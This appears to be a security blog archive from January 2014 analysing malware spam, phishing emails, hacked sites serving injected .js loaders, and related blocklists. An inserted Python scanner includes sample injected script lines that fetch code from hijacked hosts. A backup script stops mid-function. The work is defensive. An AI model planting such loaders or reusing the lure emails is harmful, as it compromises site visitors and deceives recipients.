
Tuesday 21 January 2014

Something evil on 5.254.96.240 and 185.5.55.75

This malware attack appears to be aimed at German speakers, and is presumably spreading through spam although I don't have a sample of the email message. What I do have is a nasty EXE-in-ZIP payload that masquerades as a bill or other communication from Deutsche Telekom, Vodafone, Fiducia or Volksbank.


URLquery shows one such download in this example: the victim is directed to [donotclick]gf-58.ru/telekom_deutschland, which downloads a ZIP file Rechnungsruckstande_9698169830015295.zip, which in turn contains a malicious executable "Mitteilung, Rechnungsruckstande 9901169820005294 Telekom Deutschland GmbH vom Januar 2014.exe" with a VirusTotal detection rate of 7/48.


The malware is downloaded from a server at 5.254.96.240 (Voxility, Romania). Sample URLs on this server (according to URLquery and VirusTotal) are:

[donotclick]gdevseesti.ru/telekom_deutschland/
[donotclick]gdevseesti.ru/vodafone_online/
[donotclick]gf-58.ru/telekom_deutschland/
[donotclick]gf-58.ru/volksbank_eg/
[donotclick]goodwebtut.ru/fiducia/
[donotclick]goodwebtut.ru/telekom_deutschland/
[donotclick]goodwebtut.ru/vodafone_online/
[donotclick]mnogovsegotut.ru/fiducia/
[donotclick]uiuim.ru/fiducia/

The Anubis report and ThreatExpert report [pdf] show that the malware calls home to dshfyyst.ru on 185.5.55.75 (UAB "Interneto vizija", Lithuania). There are some other suspect sites on the same server which may be worth blocking (see below).

All these sites are .ru domains registered to the infamous "Private Person" so there are no clues as to their ownership.

Recommended blocklist:
5.254.96.240
gf-58.ru
uiuim.ru
okkurp.ru
gdevseesti.ru
goodwebtut.ru
mnogovsegotut.ru
185.5.55.75
gossldirect.ru
dshfyyst.ru

Update: this appears to be Cridex aka Feodo, read more.

Monday 20 January 2014

WhatsApp "A friend of yours has just sent you a pic" spam

This fake WhatsApp spam has a malicious attachment:

Date:      Mon, 20 Jan 2014 06:23:28 -0500 [06:23:28 EST]
From:      WhatsApp [{messages@whatsapp.com}]
Subject:      A friend of yours has just sent you a pic

Hey!

Someone you know has just sent you a pic in WhatsApp. Open attachments to see what it is.

© 2013 WhatsApp Inc

Attached to the message is an archive file IMG9900882.zip which in turn contains a malicious executable IMG9900882.exe which has a VirusTotal detection rate of 20/49. The Malwr analysis gives few clues as to what the malware does, and other automated analysis tools are inconclusive.

"Thank you for scheduling a payment to Bill Me Later" spam

This fake Bill Me Later spam has a malicious attachment:

Date:      Mon, 20 Jan 2014 14:23:08 +0000 [09:23:08 EST]
From:      Bill Me Later [service@paypal.com]
Subject:      Thank you for scheduling a payment to Bill Me Later

BillMeLater
   
Log in here
       
Your Bill Me Later® statement is now available!

Dear Customer,

Thank you for making a payment online! We've received your
Bill Me Later® payment of $1603.57 and have applied it to your account.

For more details please check attached file

Summary:

Your Bill Me Later Account Number Ending in: 0266

You Paid: $1603.57

Your Payment Date*: 01/20/2014

Your Payment Confirmation Number: 971892583971968191

Don't forget, Bill Me Later is the perfect way to shop when you want more time to pay for the stuff you need. Plus, you can always find great deals and discounts at over 1000 stores. Watch this short, fun video to learn more.

BillMeLater

*NOTE: If your payment date is Saturday, or a holiday, it will take an additional day for the payment to appear on your account. However, you will be credited for the payment as of the payment date.
Log in at PayPal.com to make a payment
Questions:
Do not reply to this email. Please send all messages through the email form on our website. We are unable to respond to account inquiries sent in reply to this email. Bill Me Later is located at 9690 Deereco Rd, Suite 110, Timonium, MD 21093 Copyright 2012 Bill Me Later Inc.

Bill Me Later accounts are issued by WebBank, Salt Lake City Utah

PQW688PP1

Attached is an archive file PP_03357442.zip which in turn contains a malicious executable PP_03357442.exe which has a VirusTotal detection rate of just 4/45. Automated analysis tools [1] [2] show an attempted connection to jatit.org on 72.9.158.240 (Colo4, US) which appears to be a legitimate (but presumably compromised) site.

Thursday 16 January 2014

"ACTION REQUIRED: A document has arrived for your review/approval (Document Flow Manager)" spam

This spam with a lengthy subject has a malicious attachment:

Date:      Thu, 16 Jan 2014 09:39:28 -0600 [10:39:28 EST]
From:      "support@salesforce.com" [support@salesforce.com]
Subject:      ACTION REQUIRED: A document has arrived for your review/approval (Document Flow Manager)
Priority:      High Priority 2

This message is for the designated recipient only and may contain privileged, proprietary, or otherwise private information. If you have received it in error, please notify the sender immediately and delete the original. Any other use of the email by you is prohibited.

Record ID: HJRQY9PSXBSK334

Supplier: http://[victimdomain.com]

Invoice No.: 5644366804

Document No.: 3319683775

Invoice amount: USD 0488.21

Rejection reason(s): Approval Required
Please find enclosed a record of invoice that could not be processed. We would like to ask you to assist us in resolving the noted rejection reasons.

Attached is a file SFHJRQY9PSXBSK334.zip which in turn contains a malicious executable SF.EXE which has an icon that makes it look like a PDF file. This file has a very low detection rate at VirusTotal of 2/48. The Malwr analysis shows an attempted connection to centrum.co.id on 75.98.233.44 (Ceranet, US). This is the only site on that server, so blocking either the IP or the domain might be useful.

Ongoing Fake flash update via .js injection and SkyDrive, Part I

Over the past few days I have seen several cases where legitimate websites have had .js files interfered with in order to serve up something malicious.

Here is a case in point.. the German website physiomedicor.de has been hacked to serve up a fake Flash download, as can be seen from this URLquery report. In this case it's pretty easy to tell what's going on from the URLquery screenshot:


What has happened is that somehow an attacker has altered several .js files on the victim's site and has appended extra code. In this case the code has been appended to [donotclick]www.physiomedicor.de/assets/rollover.js as follows:


In this case the injected code tries to load a script from a hijacked site [donotclick]ghionmedia.com/PROjes/goar2RAn.php?id=56356336. This isn't the first time today that I've seen this format of URL injected into a script, as I've seen these other two (also using hijacked sites) as well:

[donotclick]berriesarsuiz.com/ptc84vRb.php?id=117515949
[donotclick]www.karsons.co.uk/qdrX3tDB.php?id=114433444

This second script was found in the high-profile ilmeteo.it hack earlier today, but I've seen it over the past couple of days in other attacks too. The format of the script and method of the attack are too similar to be a coincidence.

This first script [pastebin] identifies itself as coming from Adscend Media LLC .. but of course that's just a comment in the script and could be fake, so let's dig a little deeper.  The key part of this script is a line that says:
document.getElementById('gw_iframe').src = 'http://ghionmedia.com/PROjes/imgfiles/b.html';
..that leads to this script [pastebin] and apart from a load of other stuff you can clearly see another reference to Adscend Media and adscendmedia.com:
    function openpp() {
        //newwindow = window.open("https://adscendmedia.com/pp_click.php?aff=8663&gate=18120&sid=&p=aHR0cDovL3Nob3ctcGFzcy5jb20v", '_blank');
    }

The adscendmedia.com link contains an aff=8663 affiliate ID which indicates that some party other than Adscend Media LLC may be responsible. This link comes up blank when I try to follow it, which might mean a number of things (even the possibility that Adscend Media have terminated the affiliate).

The "other stuff" I mentioned includes a download from skydrive.live.com which is the same thing mentioned in this F-Secure post yesterday. (You can read more about this in Part II)

Adscend Media say that the affiliate was suspended from their network (see the comments below) and they have no control over the code that is showing. Specifically:
..these attacks are not using our advertising services in ANY way. They simply have copied the Javascript code of our content-locking product and used it for their own purposes. Therefore to call this "an Adscend Media ad" is not accurate. In the previous case, there was a commented-out line of Javascript code (where they had replaced our code with their new code), and we were able to see an account number of the person who copied our script, and we suspended the account, however at no point has our real service been used to spread malware. If a person were to copy HTML source code from this page, and use it on a blog that infects users with malware, it would be damaging to your name to repeatedly tie you to something over which you have no control, and that is what is happening here with our company.

You can read part 2 of the analysis here.

Cushion Redirect sites using hijacked GoDaddy domains to block

A very quick write-up about some suspect activity on 194.28.175.129 (BESTHOSTING-AS ON-LINE Ltd, Ukraine), which appears to be hosting some Cushion Redirect domains (explained here) that are being injected into certain sites such as the one in this URLquery report.

A brief examination of the server shows several subdomains of hijacked GoDaddy domains being used for malicious redirects:


The hijacked GoDaddy domains in question are:
allgaysitespassfree.com
amateurloginfree.com
yourchicagocarservice.com
yourchicagogranite.com
yourchicagohummerlimo.com
yourbestpartybus.com

A quick look at the Google stats for AS42655 indicates to me personally that blocking 194.28.172.0/22 might be a prudent idea if you don't have any reason to send traffic to Ukrainian sites.

ilmeteo.it hacked

Popular Italian weather site ilmeteo.it appears to have been compromised this morning, with several legitimate .js files on the site altered to drive traffic towards a malicious hacked domain at karsons.co.uk.

The payload is unclear because at the moment the payload site itself is out of bandwidth. It could either be a malware payload or possibly a rogue ad network (which could also be used to spread malware).

According to Alexa statistics, ilmeteo.it is the 29th most popular site in Italy and the 1305th most popular worldwide.

This URLquery report shows the scripts with the injected code:


The injection attempts to run code at [donotclick]www.karsons.co.uk/qdrX3tDB.php?id=114433444 and it can be found in the site's .js files (for example [donotclick]http://www.ilmeteo.it/im10.js). Right at the moment the site has exceeded its bandwidth and is erroring out.

It's hard to say exactly what the payload is or how many users may have been impacted. I've seen a few of these attacks recently that look like they are linked to a rogue ad network, but I can't confirm it in this case.

Update: site appears to be clean as of 1133 CET according to URLquery.
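As an added example (not code from either post, the affected sites, or any tool the posts mention), here is a small Python scanner for the appended-loader injection described in Part I above and again in this ilmeteo.it post. The sample .js contents are constructed; the loader URLs and the gw_iframe line are the ones quoted in the posts, while the same-site ajaxload.php reference is invented to show what must not be flagged.

```python
"""Scan .js files for the appended remote-loader injection seen in the posts:
(a) a URL of the form http://<host>/.../<8 alphanumerics>.php?id=<digits>, and
(b) an element .src rewrite pointing at an absolute URL, flagged only when the
target host is not the site being scanned. Example code added to this page."""
import re
from typing import Dict, List
from urllib.parse import urlparse

# Loader URL shape quoted in the posts, e.g. /PROjes/goar2RAn.php?id=56356336
# and /qdrX3tDB.php?id=114433444: an 8-character PHP name plus a numeric id.
LOADER_URL = re.compile(
    r"""https?://[A-Za-z0-9.\-]+(?:/[^\s'"]*?)?/[A-Za-z0-9]{8}\.php\?id=\d+""")

# The iframe redirect quoted in Part I:
#   document.getElementById('gw_iframe').src = 'http://.../b.html';
IFRAME_SRC = re.compile(
    r"""getElementById\(\s*['"]([^'"]+)['"]\s*\)\s*\.src\s*=\s*['"](https?://[^'"]+)['"]""")


def same_site(host: str, site_host: str) -> bool:
    """True if host is site_host or a subdomain of it (a www. prefix is ignored)."""
    host, site = host.lower().strip("."), site_host.lower().strip(".")
    if site.startswith("www."):
        site = site[4:]
    return host == site or host.endswith("." + site)


def find_injections(js_text: str, site_host: str) -> List[Dict]:
    """Return one finding per off-site loader URL or iframe src rewrite."""
    findings = []
    for lineno, line in enumerate(js_text.splitlines(), start=1):
        for m in LOADER_URL.finditer(line):
            host = urlparse(m.group(0)).hostname or ""
            if not same_site(host, site_host):
                findings.append({"kind": "loader_url", "line": lineno, "host": host,
                                 "url": m.group(0), "element": None})
        for m in IFRAME_SRC.finditer(line):
            host = urlparse(m.group(2)).hostname or ""
            if not same_site(host, site_host):
                findings.append({"kind": "iframe_src", "line": lineno, "host": host,
                                 "url": m.group(2), "element": m.group(1)})
    return findings


def appended_at_tail(js_text: str, findings: List[Dict], tail_lines: int = 3) -> bool:
    """True when every finding sits in the last tail_lines lines of the file,
    the 'extra code appended to a legitimate file' shape the posts describe."""
    total = len(js_text.splitlines())
    return bool(findings) and all(f["line"] > total - tail_lines for f in findings)


def hosts_to_block(findings: List[Dict]) -> List[str]:
    """Distinct off-site hosts referenced by the findings, for a blocklist."""
    return sorted({f["host"] for f in findings})


# Constructed samples: the URLs come from the posts, the surrounding JS does not.
CLEAN_JS = """function swapImage(el, src) {
  el.src = src;
}
// same-site references are normal and must not be flagged
var spinner = 'http://www.physiomedicor.de/assets/spinner.gif';
var loader = 'http://www.physiomedicor.de/assets/ajaxload.php?id=1';
"""

# rollover.js with the Part I loader and the iframe rewrite appended
INJECTED_JS = CLEAN_JS + (
    "var s=document.createElement('script');"
    "s.src='http://ghionmedia.com/PROjes/goar2RAn.php?id=56356336';"
    "document.body.appendChild(s);\n"
    "document.getElementById('gw_iframe').src = "
    "'http://ghionmedia.com/PROjes/imgfiles/b.html';\n"
)

# im10.js as described in the ilmeteo.it post, with the karsons.co.uk loader appended
ILMETEO_JS = "var im10 = {};\n" + (
    "var s=document.createElement('script');"
    "s.src='http://www.karsons.co.uk/qdrX3tDB.php?id=114433444';"
    "document.head.appendChild(s);\n"
)

if __name__ == "__main__":
    for name, text, site in (("rollover.js", INJECTED_JS, "physiomedicor.de"),
                             ("im10.js", ILMETEO_JS, "ilmeteo.it")):
        found = find_injections(text, site)
        print(name, "appended at tail:", appended_at_tail(text, found))
        for f in found:
            print("  line %d %s -> %s" % (f["line"], f["kind"], f["url"]))
        print("  hosts to block:", hosts_to_block(found))
```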

Wednesday 15 January 2014

Staples "Your order is awaiting verification!" spam

This fake Staples spam has a malicious attachment:

Date:      Wed, 15 Jan 2014 15:40:44 +0800 [02:40:44 EST]
From:      Staples Advantage Orders [Order@staplesadvantage.com]
Subject:      Your order is awaiting verification!
                                           
Order Status: Awaiting verification
Order #: 5079728
Your order has been submitted and is awaiting verification from you.
Order #:     5079728
Order Date and Eastern Time:     2/19/2013 12:28 PM
Order Total:     $152.46
   
This is potentially due to missing or invalid order or payment information. If you receive this status message, please call Customer Service immediately for assistance.
For Staples Advantage Support, call 1-800-633-6080 or email Support@staplesadvantage.com.

Attached is a ZIP file Order_5079728.zip which in turn contains a malicious executable Order_{_partorderb}.exe which has a VirusTotal detection rate of 23/47. The Malwr report is pretty inconclusive, so presumably the binary is hardened against automated analysis tools.

Tuesday 14 January 2014

PG&E "Gas and Electric Usage Statement" spam


This fake spam from the Pacific Gas & Electric company is presumably meant to have a malicious payload, but all I get is a server error..

From:     PG&E [do_not_reply@sourcefort.com]
Reply-To: PG&E [do_not_reply@sourcefort.com]
Date:     14 January 2014 22:37
Subject:     Gas and Electric Usage Statement

PG & E ENERGY STATEMENT             Account No: 718198305-5
                                                Statement Date: 01/10/2014
                                                Due Date: 02/01/2014
Your Account Summary

Amount Due on Previous Statement           $344.70

Payment(s) Recieved Since Last Statement   0.0 

Previous Unpaid Balance                    $344.70

Current Electric Charges                   $165.80
Current Gas Charges                        49.20   

Total Amount Due BY 02/01/2014 $559.7

To view your most recent statement, please click here You must log-in to your account or register for an online account to view your statement.

Total Amount Due BY 02/01/2014 $559.7

To give PG&E full credit, they have a link on their homepage about it and a full warning here. These scam emails seem to have been doing the rounds for quite a few days now.

"Uncensored download" spam leads to adware

I've been plagued with these over the past few days, emails coming in with the following subjects:

Underground XXX files
Free porno torrents
Uncensored download


The body text contains just a link to [donotclick]goinst.com/download/getfile/1205000/0/?q=Uncensored%20download

In turn this downloads a file Uncensored download__3516_i263089565_il6090765.exe and of course that's about as trustworthy as a van with "FREE CANDY" scrawled on the side. In blood.

A quick look at the EXE in VirusTotal indicates that it's some sort of Adware, probably pay-per-install. An examination of the binary shows a digital signature for Shetef Solutions & Consulting (1998) Ltd who are probably not behind the spam run, but are probably inadvertently paying the spammers for installations.

A Malwr analysis of the file can be found here.

Avoid.

HSBC "Payment Advice" spam / Payment Advice.exe


This fake HSBC spam comes with a malicious attachment:

Date:      Tue, 14 Jan 2014 11:57:29 -0300 [09:57:29 EST]
From:      HSBC Advising Service [advising.service.738805677.728003.693090157@mail.hsbcnet.hsbc.com]
Subject:      Payment Advice - Advice Ref:[G72282154558] / Priority payment / Customer Ref:[63 434S632U9I]


Sir/Madam

The attached payment advice is issued at the request of our customer. The advice is for your reference only.

Yours faithfully

Global Payments and Cash Management

HSBC

***************************************************************************

This is an auto-generated email, please DO NOT REPLY. Any replies to this email will be disregarded.

***************************************************************************

This e-mail is confidential. It may also be legally privileged. If you are not the addressee you may not copy, forward, disclose or use any part of it. If you have received this message in error, please delete it and all copies from your system and notify the sender immediately by return e-mail.

***************************************************************************

"SAVE PAPER - THINK BEFORE YOU PRINT!"

There is an attachment Payment Advice [G72282154558].zip which contains an executable Payment Advice.exe with a VirusTotal detection rate of 12/48. Automated analysis by Comodo CAMAS shows an attempted connection to thebostonshaker.com on 206.190.147.139 (Salt Lake City Hosting, US). It is the only site on this IP address, so temporarily blocking either may give some protection.

Monday 13 January 2014

"Department of Treasury Notice of Outstanding Obligation" spam

This US Treasury spam (but apparently sent from salesforce.com) has a malicious attachment:

Date:      Mon, 13 Jan 2014 18:54:16 +0700 [06:54:16 EST]
From:      "support@salesforce.com" [support@salesforce.com]
Subject:      Department of Treasury Notice of Outstanding Obligation - Case H6SYVMK704BX4AL

Important  please review and sign the attached document!

We have received notification from the Department of the Treasury,
Financial Management Service (FMS) that you have an outstanding
obligation with the Federal Government that requires your immediate
attention.

In order to ensure this condition does not affect any planned
contract or grant activity, please review and sign the attached document and if
you are unable to understand the attached document please call FMS at 1-800-304-3107
to address this issue.  Please make sure the person making the telephone call has the
Taxpayer Identification Number available AND has the authority/knowledge
to discuss the debt for the contractor/grantee.

Questions should be directed to the Federal Service Desk at:

http://www.bpn.gov/ccr/Help.aspx
Phone : 1-866-606-5048
Int. Phone 1-344-206-5406 for international calls
For DSN, dial 809-463-3029. Wait for a dial tone, and then dial 866-606-5472. 

Attached is a file FMS-Case-H6SYVMK704BX4AL.zip (VirusTotal detection rate 7/47) which in turn contains a malicious executable FMS-Case-{_Case_DIG}.exe (detection rate also 7/47). The Malwr analysis shows an attempted connection to anggun.my.id on 38.99.253.234 (Cogent, US). This seems to be the only domain on that server, blocking either may be prudent.

Friday 10 January 2014

Marketing1.net spam

These spammers sent their sales pitch to a random info@ email address on an unused domain I use. And what are they selling? Email marketing lists.. well, if they used their own mailing list for this then it is obviously crap.

From:     Audrey Martin [info@globalcrm-eu.net]
Reply-To:     info@globalcrm-eu.net
Date:     10 January 2014 07:32
Subject:     Happy New Year! - Followup to our last offer

Dear Madam, Dear Sir

Everyone in our team would like you wish you a happy and successful new year 2014! To help make this year even better for you, we have decided to give 20'000 free business contacts to the first 200 people visiting our website this morning! You don't have to buy anything. You can just visit our website and download the free business contacts!

Over the last year, we have helped hundreds of businesses like yours find new customers and achieve growth by using our highly targeted business database on CD. Our database, available for download from our website, is the only one on the market which includes targeted info on over 5 million Businesses in the UK.

Last December, we decided to take our Business Database CD off the market after a last sale because the cost to update the database regularly had become too high and we want to concentrate on the development of new products.

A lot of businesses since then, requested us to renew our last sale after its discontinuation. Not only have we decided to renew our last offer for a period of 8 hours (until 4PM this afternoon) before finally taking the database off the market, but we have decided to give to the first 200 people visiting our website this morning 20'000 free business contacts.

Here is a quick reminder of what is offered in our Business Database CD:

- 5 million Businesses in the UK selectable by Industry/Location/Company Size/Premises type/Job title
- Over 300,000 Businesses with email addresses
- 4 million named Decision Makers available by job function
- Unlimited export to .CSV or Excel
- Updated in October

We have decided to give you a last opportunity to get your hands on the database, as we are convinced it can dramatically help your business. We are offering to the first 100 customers placing their order today before 4PM, an unrestricted version of the database with unlimited export capabilities (as opposed to the standard version which has a limit of 50'000 exports) - and this, for a substantially reduced price of £199 instead of £498!  This will end at 4PM today, so don't miss it because some your competitors won't!


20'000 Free Business Contacts

We are so confident that the extensive data can help your business that we are giving away a free sample with 20'000 Business contacts to the first 200 people visiting our website this morning. This allows you to evaluate the quality of the data before completing your purchase. Visit our website to download the free sample and jumpstart your business!

To download the free sample, to get more infos or place your order, click here to visit our website

To your success in 2014 and beyond,

Audrey Martin
Marketing Solutions

Unsubscribe: Click here if you do not want to receive any further emails from us

This is a service from Marketing Solutions

Powered by Hairyspire

The link in the email goes to a domain globalcrm-eu.net on 217.147.82.106 (Iomart, UK) which is also the server sending the spam. The domain is registered with incomplete WHOIS details to mask the sender's identity. From there the victim is sent to m1databases-uk.net on a shared server at 66.96.161.162 (Endurance International Group, US), also with incomplete WHOIS records, until they end up on the main site at marketing1.net hosted at 89.187.86.69 (Coreix, UK). The WHOIS details for this last one are inconclusive:

Domain Name: MARKETING1.NET
Registry Domain ID: 91418733_DOMAIN_NET-VRSN
Creation Date: 2002-10-21 18:13:12Z
Registrar Registration Expiration Date: 2014-10-21 18:13:12Z
Registrar: ENOM, INC.
Registrar Abuse Contact Email: abuse@enom.com
Registrar Abuse Contact Phone: +1.4252744500
Domain Status: clientTransferProhibited
Registry Registrant ID:
Registrant Name: MARKETING SOLUTIONS
Registrant Organization: -
Registrant Street: 152 CITY ROAD
Registrant City: LONDON
Registrant State/Province: LONDON
Registrant Postal Code: EC1V 2NX
Registrant Country: GB

Registrant Phone: +1.20814497
Registrant Phone Ext: 
Registrant Fax: 
Registrant Fax Ext:
Registrant Email: MAIL@MARKETING1.NET
Registry Admin ID: 
Admin Name: MARKETING SOLUTIONS
Admin Organization: -
Admin Street: 152 CITY ROAD
Admin City: LONDON
Admin State/Province: LONDON
Admin Postal Code: EC1V 2NX
Admin Country: GB
Admin Phone: +1.2081449762
Admin Phone Ext: 
Admin Fax: 
Admin Fax Ext:
Admin Email: MAIL@MARKETING1.NET
Registry Tech ID: 
Tech Name: MARKETING SOLUTIONS
Tech Organization: -
Tech Street: 152 CITY ROAD
Tech City: LONDON
Tech State/Province: LONDON
Tech Postal Code: EC1V 2NX
Tech Country: GB
Tech Phone: +1.2081449762
Tech Phone Ext: 
Tech Fax: 
Tech Fax Ext: 
Tech Email: MAIL@MARKETING1.NET
Name Server: NS10.DNSMADEEASY.COM
Name Server: NS11.DNSMADEEASY.COM
Name Server: NS12.DNSMADEEASY.COM
Name Server: NS13.DNSMADEEASY.COM
DNSSEC: unSigned
Last update of WHOIS database: 2013-10-22 09:22:28Z

This address is an accommodation address that serves hundreds of different companies. I cannot find a trace of a company called Marketing1 or Marketing Solutions registered to this address at Companies House.

The marketing1.net website looks slick enough..

But again it gives no real indication as to who owns or runs the company anywhere. The only contact details are as follows:

Marketing1
152 City Road
UK - London EC1V 2NX

Tel: +44 208 144 9762
email: contact@marketing1.net

The 89.187.86.69 server also contains a number of other related domains with fake or incomplete WHOIS details.

You should never buy anything promoted through spam, and it is especially important not to buy email lists in this way. You (as the sender) will end up with the legal liability for anything that you do, but Marketing1 masks whoever is the true owner.. so good luck with ever finding that out (I suspect they are not based in the UK at all). Avoid.

UPDATE 2014-05-09: these grubby spammers are at it again, using the domain m1-datacrmeu.net to mask their true domain. I took a look at these "20'000" free records, and the ones I checked were laughably out-of-date. No wonder the database is so cheap!

Wednesday 8 January 2014

More "Voice Message from Unknown" spam

Another bunch of fake "voice message" spams with a malicious payload are doing the rounds, for example:

Subject: Voice Message from Unknown (996-743-6568)
Subject: Voice Message from Unknown (433-358-8977)
Subject: Voice Message from Unknown (357-973-7738)

Body:
- - -Original Message- - -

From: 996-743-6568

Sent: Wed, 8 Jan 2014 12:06:38 +0000

To: [redacted]

Subject: Important Message to All Employees  

Attached is a file VoiceMessage.zip which in turn contains VoiceMessage.exe which has a VirusTotal detection rate of 11/47. Automated analysis tools [1] [2] show an attempted connection to casbir.com.au on 67.22.142.68 (Cologlobal, Canada). This appears to be the only server on this IP address, so blocking or monitoring it for the time being may be prudent.

Monday 6 January 2014

"Unauthorized Activity on your Amazon account" phish

The New Year seems to have brought a new wave of phishing emails, here's a new one looking for Amazon credentials.

Date:      Mon, 6 Jan 2014 08:19:39 -0000 [03:19:39 EST]
From:      Amazon [noreply@trysensa.com]

Case- 91289-90990

Unauthorized Activity on your Amazon account.

We recently confirmed that you had unauthorized activity on your Amazon account.

Please be assured that because your card includes "zero-liability fraud protection" , you are not responsible for unauthorized use of your card.

Unfortunately, we have not confirmed your complete information , please follow the instructions below.

Click the link below to validate your account information using our secure server:

Click Here To Active Your Amazon Account

For your protection, you must verify this activity before you can continue using your account

Thank You.
Amazon LTD Security System

The link in the email goes to [donotclick]immedicenter.com/immedicenter/images/yootheme/menu/Amazon/index.php and comes up with a convincing-looking Amazon login page:


The next page phishes for even more information:


And now it goes after your credit card information:

And having stolen all your information, you get a nice message to say thank-you:

The hapless victim then gets sent to the genuine Amazon.com website.

In most email clients, hovering over the link would clearly demonstrate that this was not the legitimate amazon.com website, and certainly once visited (not something I would recommend) the address bar at the top of the browser would clearly indicate it is not amazon.com.

If you have accidentally clicked through this email and provided all the details then you should contact your bank immediately and also change your Amazon password plus any other places that you use that same username/password combination.

Tracking the fake profiles used by scammers

My interest was grabbed by this weirdly mistranslated email, which appears to have been badly written in English and then put through a translator program that has stumbled over the original email's bad punctuation.

From:     mark dave [markdave440@gmail.com]
Reply-To:     markpetersloanfirm@gmail.com
Date:     6 January 2014 00:37

أنا السيد مارك بيترز مشروعة والمقرض القرض السمعة. نحن
شركة ديناميكية بقروض من assistance.We المالية إلى الأفراد
في حاجة إلى المساعدة المالية، التي لديها سوء الائتمان أو في حاجة الى المال
لتسديد الفواتير، للاستثمار في بأعمال تجارية ترغب في استخدام هذه الوسيلة لأبلغكم
أننا تقديم المساعدة موثوقة والمستفيد كما نكون سعداء لتقديم لكم
وloan.contact بنا عبر عنوان البريد الإلكتروني: markpetersloanfirm@gmail.com
وتشمل الخدمات المقدمة؛ إعادة تمويل، تحسين المنزل، قرض الاستثمار، السيارات
القروض، وتوطيد الدين، خط الائتمان، والرهن العقاري الثانية، والأعمال التجارية
القروض، والقروض الشخصية، قروض السيارات، قروض السيارات.

يرجى الكتابة الى الوراء اذا كانت مهتمة.

الاسم الكامل:
البلد والدولة:
المدينة:
الجنسية:
مبلغ القرض المطلوب:
الجنس:
الإيجار الشهري:
الاتصال الهاتف:
الرمز البريدي:
مدة القرض:
هل تتكلم اللغة الإنجليزية:
This translates roughly as:

I Mr. Mark Peters legitimate and reputable loan lender. We
Dynamic company with loans from financial assistance.We to individuals
In need of financial assistance, that have a bad credit or in need of money
To pay bills, to invest in the business want to use this medium to inform you
We provide reliable and beneficiary assistance as be glad to offer you
And loan.contact us via e-mail address: Markpetersloanfirm@gmail.com
The services provided include; refinance, home improvement, investment loan, car
Loans, debt consolidation, credit line, and a second mortgage, and business
Loans, personal loans, car loans, car loans.

Please write back if interested.

Full name:
Country and State:
City:
Nationality:
The loan amount required:
Gender:
Monthly rent:
Contact Phone:
Zip Code:
Loan term:
Do you speak English:

We are waiting for your responds. 
Obviously this is a scam, but it turns out that "Mark Dave" has a Google+ profile with the following photo:


So who is this a photo of? Well, if you haven't checked out Google Images you might not know just how good the reverse image search is. Clicking the camera icon allows you to upload an image or reverse search an image by URL:



The results for that photo are pretty revealing and lean heavily towards scams:

This thread on RomanceScam.com explains what is going on very well. The pictures belong to an innocent person called Stuart James who has had their online photo collection plundered by scammers in what adds up to a particularly cruel type of identity theft. It is perhaps an object lesson in not sharing too much online, and it seems to be a particular risk for anyone good looking and/or in the military.

ScamDigger also has a gallery of images commonly used by scammers, with the caveat that the people pictured are all innocent parties which makes interesting (but depressing) viewing.

A reverse image search is certainly useful sometimes at uncovering fake profiles, and it's something that anyone with basic computer skills should be able to do. Note that you can also use TinEye to do a similar search with a slightly different set of results, and I guess there are other reverse image search engines available, but between Google and TinEye you should be able to uncover fake profiles with ease.

Thursday 2 January 2014

Windows.old, and the Windows XP to Windows 8.1 gotcha

So I finally got around to the long over-due task of migrating my main system off Windows XP 32-bit (because it is going out of support soon) to Windows 8.1 64-bit because.. well, it's cheaper to go the Windows 8.x route than Windows 7 and 8 does have some interesting features.

You can't really upgrade Windows XP to Windows 8.1 in the traditional sense: it is basically a completely new installation, but it does retain your original Windows XP data so you can get to it later. But there's a gotcha here.

Windows 8.1 is a free upgrade to Windows 8, and I already had a Windows 8 upgrade disk that I bought a few months back. Upgrading from Windows XP to Windows 8 does create a set of backup files in a folder called windows.old so you can recover your data, including what was in the C:\Documents and Settings folder. So, in theory you just copy the old data from that folder into your new Documents folder.

Here's the gotcha. If you're like me, you've probably been putting off the Windows 8 upgrade until you can have Windows 8.1 which brings back the Start button. So the obvious next step is to do that (although you need to install KB2871389 to show Windows 8.1 in the app store). You can then do the 3GB+ download to install Windows 8.1 over Windows 8 which runs pretty smoothly. But before you do that.. remember to take your data out of the windows.old folder!

The trap here is that when you upgrade from Windows 8 to Windows 8.1, the contents of the windows.old folder are deleted and overwritten, destroying the backup data from Windows XP.

Uh-oh. It's a good job that I'm paranoid about backups, so nothing was lost. But it's easy to see how people could lose data if they don't recover it from windows.old before doing the Windows 8.1 upgrade.

It really, really is worth investing in some offline storage or other backup medium before you do this. I took the opportunity to clone Windows XP to a new SSD drive before doing the upgrade and I disconnected the original hard disk, and I also made an offline backup to be on the safe side. But if I had just ploughed on and done the deed then I would have lost irreplaceable data. 

Windows 8.1 is.. well, weird. But it does run very quickly on my four-year-old Dell Precision workstation with the SSD drive and a memory upgrade. Apart from the vanishing data it all went remarkably smoothly (if you are knowledgeable about Windows systems) and it didn't require any unpleasantness such as driver disks. The application troubleshooting is pretty awesome for apps that don't run properly under the new OS, and there are only a few really ancient 16-bit apps that I can't get to work that need recoding. Ah well, it should keep the computer up-to-date with security updates until 2023 which should easily be longer than the expected lifespan of the machine..
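Added example, not from the original post: a small Python script that copies the profile folders out of windows.old to a separate drive and verifies every file by hash, so the copy can be checked before the Windows 8.1 upgrade wipes the folder. The drive letters are assumptions; the "Documents and Settings" (XP) and "Users" (Windows 8) layouts are the ones the post describes.

```python
import hashlib
import shutil
from pathlib import Path

# Profile roots as they appear under windows.old: the XP layout after an
# XP -> 8 upgrade, and the Vista+ layout after an 8 -> 8.1 upgrade (assumed).
PROFILE_DIRS = ("Documents and Settings", "Users")


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large profile files do not load into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def find_profiles_root(windows_old: Path) -> Path:
    """Return whichever profile root exists inside windows.old, else raise."""
    for name in PROFILE_DIRS:
        candidate = windows_old / name
        if candidate.is_dir():
            return candidate
    raise FileNotFoundError(f"no profile directory under {windows_old}")


def salvage(windows_old: Path, backup_root: Path) -> dict:
    """Copy profiles to backup_root and hash-verify each file; do not upgrade while 'mismatched' is non-empty."""
    src_root = find_profiles_root(windows_old)
    dst_root = backup_root / src_root.name
    shutil.copytree(src_root, dst_root, dirs_exist_ok=True)
    result = {"copied": 0, "verified": 0, "mismatched": []}
    for src in src_root.rglob("*"):
        if not src.is_file():
            continue
        dst = dst_root / src.relative_to(src_root)
        result["copied"] += 1
        if dst.is_file() and sha256_of(src) == sha256_of(dst):
            result["verified"] += 1
        else:
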